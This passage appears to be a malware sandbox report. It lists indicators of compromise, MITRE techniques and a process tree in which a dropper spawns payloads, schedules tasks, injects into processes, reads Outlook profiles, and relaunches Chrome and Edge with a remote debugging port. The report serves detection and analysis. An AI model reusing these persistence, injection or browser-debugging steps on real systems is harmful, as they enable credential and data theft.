Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Kills process with taskkill 2 IoCs

evasion

Processes:

taskkill.exetaskkill.exe

pid	Process
380	taskkill.exe
6028	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772123009559434"	chrome.exe

Modifies registry class 2 IoCs

Processes:

7zFM.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe

Runs net.exe

Runs ping.exe 1 TTPs 22 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
4884	PING.EXE
5648	PING.EXE
4756	PING.EXE
2240	PING.EXE
112	PING.EXE
5772	PING.EXE
5228	PING.EXE
5436	PING.EXE
3648	PING.EXE
7848	PING.EXE
1796	PING.EXE
6208	PING.EXE
3700	PING.EXE
2540	PING.EXE
5956	PING.EXE
3728	PING.EXE
212	PING.EXE
5648	PING.EXE
1752	PING.EXE
6352	PING.EXE
5508	PING.EXE
5656	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 22 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
5704	schtasks.exe
4576	schtasks.exe
7200	schtasks.exe
5616	schtasks.exe
6564	schtasks.exe
4608	schtasks.exe
6124	schtasks.exe
2476	schtasks.exe
4584	schtasks.exe
6256	schtasks.exe
5924	schtasks.exe
6892	schtasks.exe
5980	schtasks.exe
3356	schtasks.exe
6656	schtasks.exe
4336	schtasks.exe
7060	schtasks.exe
2380	schtasks.exe
5856	schtasks.exe
4988	schtasks.exe
6028	schtasks.exe
3964	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exeTPB-1.exerandom.exechrome.exeWinsvc.exe

pid	Process
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3924	TPB-1.exe
3924	TPB-1.exe
3556	taskmgr.exe
3556	taskmgr.exe
3664	random.exe
3664	random.exe
3924	TPB-1.exe
3924	TPB-1.exe
3556	taskmgr.exe
3556	taskmgr.exe
4172	chrome.exe
4172	chrome.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
5108	Winsvc.exe
5108	Winsvc.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

Processes:

7zFM.exetaskmgr.exeserver.exeServer.exeServer1.exe

pid	Process
1284	7zFM.exe
3556	taskmgr.exe
5632	server.exe
6436	Server.exe
3016	Server1.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

chrome.exemsedge.exechrome.exe

pid	Process
4172	chrome.exe
4172	chrome.exe
4172	chrome.exe
5284	msedge.exe
5284	msedge.exe
5284	msedge.exe
5284	msedge.exe
5112	chrome.exe
5112	chrome.exe
5112	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exe4363463463464363463463463.exeNew Text Document mod.exeNew Text Document mod.exetaskmgr.exeWinsvc.exegvndxfghs.exechrome.exe4363463463464363463463463.exeInstallUtil.exexblkpfZ8Y4.exeMSBuild.exeAddInProcess.exeMSBuild.exeserver.exegvndxfghs.exe4363463463464363463463463.exeServer.exegvndxfghs.exeNew Text Document mod (2).exe

description	pid	Process
Token: SeRestorePrivilege	1284	7zFM.exe
Token: 35	1284	7zFM.exe
Token: SeSecurityPrivilege	1284	7zFM.exe
Token: SeSecurityPrivilege	1284	7zFM.exe
Token: SeDebugPrivilege	3724	4363463463464363463463463.exe
Token: SeDebugPrivilege	3536	New Text Document mod.exe
Token: SeDebugPrivilege	4676	New Text Document mod.exe
Token: SeDebugPrivilege	3556	taskmgr.exe
Token: SeSystemProfilePrivilege	3556	taskmgr.exe
Token: SeCreateGlobalPrivilege	3556	taskmgr.exe
Token: SeDebugPrivilege	5108	Winsvc.exe
Token: SeDebugPrivilege	4372	gvndxfghs.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeDebugPrivilege	5108	Winsvc.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeShutdownPrivilege	4172	chrome.exe
Token: SeCreatePagefilePrivilege	4172	chrome.exe
Token: SeDebugPrivilege	6172	4363463463464363463463463.exe
Token: SeDebugPrivilege	4460	InstallUtil.exe
Token: SeLockMemoryPrivilege	6148	xblkpfZ8Y4.exe
Token: SeLockMemoryPrivilege	6148	xblkpfZ8Y4.exe
Token: SeDebugPrivilege	4980	MSBuild.exe
Token: SeLockMemoryPrivilege	6092	AddInProcess.exe
Token: SeLockMemoryPrivilege	6092	AddInProcess.exe
Token: SeDebugPrivilege	6252	MSBuild.exe
Token: SeDebugPrivilege	5632	server.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: SeDebugPrivilege	5760	gvndxfghs.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: SeDebugPrivilege	6424	4363463463464363463463463.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: SeDebugPrivilege	6436	Server.exe
Token: 33	6436	Server.exe
Token: SeIncBasePriorityPrivilege	6436	Server.exe
Token: SeDebugPrivilege	2908	gvndxfghs.exe
Token: 33	5632	server.exe
Token: SeIncBasePriorityPrivilege	5632	server.exe
Token: 33	6436	Server.exe
Token: SeIncBasePriorityPrivilege	6436	Server.exe
Token: SeDebugPrivilege	6340	New Text Document mod (2).exe
Token: 33	5632	server.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exetaskmgr.exechrome.exe

pid	Process
1284	7zFM.exe
1284	7zFM.exe
1284	7zFM.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
4172	chrome.exe
4172	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	Process
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe
3556	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

MSBuild.exeTPB-1.exe

pid	Process
4980	MSBuild.exe
6964	TPB-1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document mod.exegvndxfghs.exeTPB-1.exechrome.exe

description	pid	Process	procid_target
PID 4676 wrote to memory of 5108	4676	New Text Document mod.exe	121
PID 4676 wrote to memory of 5108	4676	New Text Document mod.exe	121
PID 4676 wrote to memory of 3924	4676	New Text Document mod.exe	122
PID 4676 wrote to memory of 3924	4676	New Text Document mod.exe	122
PID 4676 wrote to memory of 3924	4676	New Text Document mod.exe	122
PID 4676 wrote to memory of 4372	4676	New Text Document mod.exe	124
PID 4676 wrote to memory of 4372	4676	New Text Document mod.exe	124
PID 4676 wrote to memory of 4372	4676	New Text Document mod.exe	124
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 2892	4372	gvndxfghs.exe	125
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 4188	4372	gvndxfghs.exe	126
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4372 wrote to memory of 2880	4372	gvndxfghs.exe	127
PID 4676 wrote to memory of 3664	4676	New Text Document mod.exe	129
PID 4676 wrote to memory of 3664	4676	New Text Document mod.exe	129
PID 4676 wrote to memory of 3664	4676	New Text Document mod.exe	129
PID 3924 wrote to memory of 4172	3924	TPB-1.exe	130
PID 3924 wrote to memory of 4172	3924	TPB-1.exe	130
PID 4172 wrote to memory of 1596	4172	chrome.exe	131
PID 4172 wrote to memory of 1596	4172	chrome.exe	131
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132
PID 4172 wrote to memory of 5012	4172	chrome.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

gvndxfghs.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	gvndxfghs.exe

outlook_win_path 1 IoCs

Processes:

gvndxfghs.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	gvndxfghs.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3448
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1284
- C:\Users\Admin\AppData\Local\Temp\Temp1_4363463463464363463463463.zip\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_4363463463464363463463463.zip\4363463463464363463463463.exe"
  2⤵
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3724
- C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3536
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test26.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test26.exe"
    3⤵
    - Executes dropped EXE
    PID:5612
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test29.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test29.exe"
    3⤵
    - Executes dropped EXE
    PID:4748
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\test24.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\test24.exe"
    3⤵
    - Executes dropped EXE
    PID:7128
- C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exse\New Text Document mod.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winsvc.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winsvc.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5108
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:4740
- - C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe
    "C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3924
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4172
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa03a0cc40,0x7ffa03a0cc4c,0x7ffa03a0cc58
        5⤵
        
        PID:1596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2012,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2008 /prefetch:2
        5⤵
        
        PID:5012
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1876,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2044 /prefetch:3
        5⤵
        
        PID:4928
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2320 /prefetch:8
        5⤵
        
        PID:2460
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1968
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3212 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1188
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4548 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4300
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4704,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:8
        5⤵
        
        PID:1664
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4120,i,12146373410572064859,9402523346854261981,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8
        5⤵
        
        PID:464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      PID:5284
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f51646f8,0x7ff9f5164708,0x7ff9f5164718
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
        5⤵
        
        PID:5876
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --lang=uk --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
        5⤵
        
        PID:6956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --lang=uk --service-sandbox-type=utility --mojo-platform-channel-handle=1340 /prefetch:8
        5⤵
        
        PID:5432
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7140
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --lang=uk --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2172,5037475927625726158,13663048712839716902,131072 --lang=uk --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
